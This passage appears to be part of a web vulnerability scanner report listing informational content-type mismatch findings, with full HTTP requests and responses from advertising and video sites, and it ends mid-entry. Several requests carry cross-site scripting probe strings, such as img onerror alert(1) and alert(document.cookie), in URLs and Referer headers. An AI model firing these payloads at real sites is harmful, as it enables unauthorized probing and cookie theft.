The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d747416/11/755589/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:37 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Wed, 01 Sep 2010 04:10:23 GMT
ETag: "700ad4cc-1-e065a9c0"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:37 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=886
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.20. http://amch.questionmarket.com/adsc/d747416/11/755592/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d747416/11/755592/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d747416/11/755592/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:35 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Wed, 01 Sep 2010 04:10:23 GMT
ETag: "936daba5-1-e065a9c0"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:35 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=958
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.21. http://amch.questionmarket.com/adsc/d763769/11/770950/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d763769/11/770950/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d763769/11/770950/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 26 Oct 2010 04:39:21 GMT
ETag: "92e0f467-1-4937db14f5e40"
Accept-Ranges: bytes
Content-Length: 1
Vary: Accept-Encoding
Keep-Alive: timeout=120, max=373
Connection: Keep-Alive
Content-Type: application/javascript

;

31.22. http://amch.questionmarket.com/adsc/d763769/11/775951/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d763769/11/775951/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d763769/11/775951/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:38 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 26 Oct 2010 04:39:21 GMT
ETag: "500e45f3-1-b1431040"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:38 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=727
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.23. http://amch.questionmarket.com/adsc/d793570/3/793590/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d793570/3/793590/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d793570/3/793590/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:40 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 14 Dec 2010 05:23:40 GMT
ETag: "60033ec6-1-5f98f00"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:40 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=641
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.24. http://amch.questionmarket.com/adsc/d793570/3/793591/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d793570/3/793591/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d793570/3/793591/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:39 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 14 Dec 2010 05:23:41 GMT
ETag: "70037fc0-1-608d140"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:39 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=541
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.25. http://amch.questionmarket.com/adsc/d798609/10/805369/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d798609/10/805369/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d798609/10/805369/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:34:06 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 16 Nov 2010 05:27:42 GMT
ETag: "90418daf-1-49524d0dca045"
Accept-Ranges: bytes
Content-Length: 1
Vary: Accept-Encoding
Keep-Alive: timeout=120, max=381
Connection: Keep-Alive
Content-Type: application/javascript

;

31.26. http://amch.questionmarket.com/adsc/d798609/10/805370/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d798609/10/805370/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d798609/10/805370/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:41 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 16 Nov 2010 05:27:42 GMT
ETag: "a47827d2-1-d0d7af80"
Accept-Ranges: bytes
Content-Length: 1
Cache-Control: public, max-age=1800
Expires: Thu, 03 Feb 2011 22:33:41 GMT
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Keep-Alive: timeout=120, max=955
Connection: Keep-Alive
Content-Type: application/x-javascript

;

31.27. http://api.veoh.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.veoh.com
Path:   /crossdomain.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain HTML.

Request

GET /crossdomain.xml HTTP/1.1
Host: api.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Content-Length: 185
Date: Thu, 03 Feb 2011 20:52:32 GMT
Connection: Keep-Alive
Content-Type: text/xml

<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

31.28. http://app.scanscout.com/ssframework/adStreamJSController.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://app.scanscout.com
Path:   /ssframework/adStreamJSController.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /ssframework/adStreamJSController.htm?a=getadscheduleforcontent&format=vast&fetchads=preroll&ss_partnerId=626&ss_mediaId=v18978294NGnK88j8&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaCategories=&ss_mediaKeywords=&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_maxPrerollDuration=30&ss_width=480&ss_height=360&ss_asVersion=3&ss_mediaDescription=&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_acceptNonvideo=Y&jsa=Y HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:34 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; Domain=.scanscout.com; Expires=Sun, 31-Jan-2021 21:07:34 GMT; Path=/
Set-Cookie: uniques=110203|626_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: psh=626_1296767254411; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: behavioralSegments=29_110203|32_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7224


<?xml version="1.0" encoding="UTF-8"?>
<VideoAdServingTemplate>
<Ad id="preroll-1">
<InLine>
<AdSystem>scanscout</AdSystem>
<AdTitle>5945246</AdTitle>
<Impression>
<
...[SNIP]...

31.29. http://app.scanscout.com/ssframework/adStreamJSController.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://app.scanscout.com
Path:   /ssframework/adStreamJSController.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /ssframework/adStreamJSController.xml?a=getadscheduleforcontent&format=vast&fetchads=overlay&ss_partnerId=626&ss_height=360&ss_width=480&asVersion=3&jsa=Y&blacklist=&ss_mediaCategories=&ss_mediaDescription=&ss_mediaId=v18978294NGnK88j8&ss_mediaKeywords=&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; behavioralSegments=29_110203|32_110203|263_110203

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:14:03 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: osh=626_1296767643681; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:03 GMT; Path=/
Set-Cookie: behavioralSegments=29_110203_2|32_110203_2|263_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:03 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 697


<?xml version="1.0" encoding="UTF-8"?>
<VideoAdServingTemplate>
<Ad id="overlay-1">
<InLine>
<AdSystem>scanscout</AdSystem>
<AdTitle>5933179</AdTitle>
<NonLinearAds>

...[SNIP]...

31.30. http://as1.suitesmart.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://as1.suitesmart.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: as1.suitesmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 24 Dec 2010 04:44:06 GMT
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 22:03:49 GMT
Content-Length: 8
Connection: close
Cache-Control: no-store

asdfasd

31.31. http://beacon.videoegg.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET / HTTP/1.1
Host: beacon.videoegg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __qca=P0-2047109742-1295039241849;

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 22:03:55 GMT
ETag: "598007-6-d7b03f80"
Last-Modified: Fri, 02 Apr 2010 00:13:02 GMT
Server: Apache
Content-Length: 6
Connection: Close

"a7";

31.32. http://beacon.videoegg.com/adpo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /adpo

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /adpo?ab=at&adserv=adtech&adtechperc=1&adtime=121&ai=0&ar=30&area=TUCOWS_728X90&bw=x&con=http%3A//www.tucows.com/previewf2a0f%2522-alert%28document.cookie%29-%2522d3b3f7c7cb3/194850/x22&dim=728x90&eapv=12368&expandable=1&fv=10.1.103&g=m&gi=0&loc=TUCOWS_728X90_ROS_728X90&pb=Tucows&pstat=exists&pui=c44284b4facda7c168b93d9c5b36440f&ral=1&rar=%20&reason=pixel&ref=http%3A//www8.tucows.com/delivery/afr.php&rid=12ded4bb0a722651782b7b687a5e35ae&si=TUCOWS_728X90&stat=no&totime=1641&type=iframe&version=2&curtime=1296766321083&curtz=360&ord=4 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/videoegg/ad.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 20:51:19 GMT
ETag: "58c007-6-bfc805c0"
Last-Modified: Sun, 31 Jan 2010 01:25:51 GMT
Server: Apache
Content-Length: 6
Connection: keep-alive

"a3";

31.33. http://beacon.videoegg.com/amcload  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /amcload

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /amcload?adserv=adtech&amctime=1515&area=TUCOWS_728X90&fv=10.1.103&handler=invitation&os=WIN&pb=Tucows&rid=12ded4bb0a722651782b7b687a5e35ae&si=TUCOWS_728X90&type=iframe&version=2&curtime=1296766320946&curtz=360&ord=2 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/videoegg/ad.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 20:51:19 GMT
ETag: "598007-6-d7b03f80"
Last-Modified: Fri, 02 Apr 2010 00:13:02 GMT
Server: Apache
Content-Length: 6
Connection: keep-alive

"a7";

31.34. http://beacon.videoegg.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /demo

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /demo?a=x&area=TUCOWS_728X90&g=m&m=1&provider=implicit&pui=c44284b4facda7c168b93d9c5b36440f&rawdata=%7B%22va%22%3A%22ya%2Cat%2Cod%22%2C%22vg%22%3A%22m%22%7D&rid=12ded4bb0a722651782b7b687a5e35ae&si=TUCOWS_728X90&t=2&curtime=1296766320897&curtz=360&ord=1 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/videoegg/ad.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 20:51:19 GMT
ETag: "878007-6-e2d01200"
Last-Modified: Fri, 14 May 2010 00:23:36 GMT
Server: Apache
Content-Length: 6
Connection: keep-alive

"a9";

31.35. http://beacon.videoegg.com/echo  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /echo

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /echo?burl=http%3A//adserver.adtechus.com/adrawdata/3.0/5108.1/1653235/0/0/ADTECH%3Bkvinvtype%3Ddisplay%3Bkvrid%3D12ded4bb0a722651782b7b687a5e35ae%3Bkvexpandable%3D1%3Bkvdim%3D728x90%3Bkvbw%3D0%3Bkvpid%3D1653235%3Bkva1824%3D100%3Bkva2534%3D100%3Bkva2544%3D100%3Bkva1834%3D100%3Bkvagt18%3D100%3Bkvagt35%3D100%3Bkvagt25%3D100%3Bkvgm%3D100%3Bkviqcintel%3D300&rid=12ded4bb0a722651782b7b687a5e35ae&curtime=1296766320943&curtz=360&ord=1 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/videoegg/ad.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 20:51:19 GMT
ETag: "6a0007-6-bfe68a40"
Last-Modified: Sun, 31 Jan 2010 01:25:53 GMT
Server: Apache
Content-Length: 6
Connection: keep-alive

"a6";

31.36. http://beacon.videoegg.com/initjs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /initjs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /initjs?pb=Tucows&si=TUCOWS_728X90&area=TUCOWS_728X90&dim=728x90&pl=x&rid=12ded4bb0a722651782b7b687a5e35ae&curtime=1296766316711&curtz=360&ord=1 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 20:51:14 GMT
ETag: "6fc007-6-e368a880"
Last-Modified: Fri, 14 May 2010 00:23:46 GMT
Server: Apache
Content-Length: 6
Connection: keep-alive

"aa";

31.37. http://beacon.videoegg.com/invpos  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://beacon.videoegg.com
Path:   /invpos

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /invpos?rid=12dee7b87149f052badfd9a8c000af6b&winwidth=300&winheight=250&adtop=0&adleft=0&curtime=1296786229993&curtz=360&ord=2 HTTP/1.1
Host: beacon.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=1&cb=975bbd80
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Fri, 04 Feb 2011 02:22:59 GMT
ETag: "58c007-6-bfc805c0"
Last-Modified: Sun, 31 Jan 2010 01:25:51 GMT
Server: Apache
Content-Length: 6
Connection: keep-alive

"a3";

31.38. http://blog.supermedia.com/comment_form.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blog.supermedia.com
Path:   /comment_form.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /comment_form.php HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:34 GMT
Server: Unspecified
Content-Length: 37
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/

You+must+enter+a+valid+email+address.

31.39. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.gigya.com
Path:   /js/gigya.services.socialize.plugins.simpleshare.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/gigya.services.socialize.plugins.simpleshare.min.js HTTP/1.1
Host: cdn.gigya.com
Proxy-Connection: keep-alive
Referer: http://abc.go.com/vp2/d/deeplinkbf5ec--%3E%3Cscript%3Ealert(1)%3C/script%3Edb1ccd44039
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 24 Jan 2011 10:13:37 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 24 Jan 2011 10:13:37 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
x-server: web102
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Fri, 04 Feb 2011 02:02:20 GMT
Connection: close
Content-Length: 21170

gigya.global._GetElementPos=function(obj){var curleft=curtop=0;if(obj.offsetParent){do{curleft+=obj.offsetLeft;curtop+=obj.offsetTop;}while(obj=obj.offsetParent);}return{left:curleft,top:curtop};};gig
...[SNIP]...

31.40. http://cdn.taboolasyndication.com/libtrc/veoh/rbox.en.4-6-1-43135.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.taboolasyndication.com
Path:   /libtrc/veoh/rbox.en.4-6-1-43135.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /libtrc/veoh/rbox.en.4-6-1-43135.json HTTP/1.1
Host: cdn.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Feb 2011 10:54:54 GMT
ETag: "1628221-284-49b5e9876db80"
Accept-Ranges: bytes
Content-Length: 644
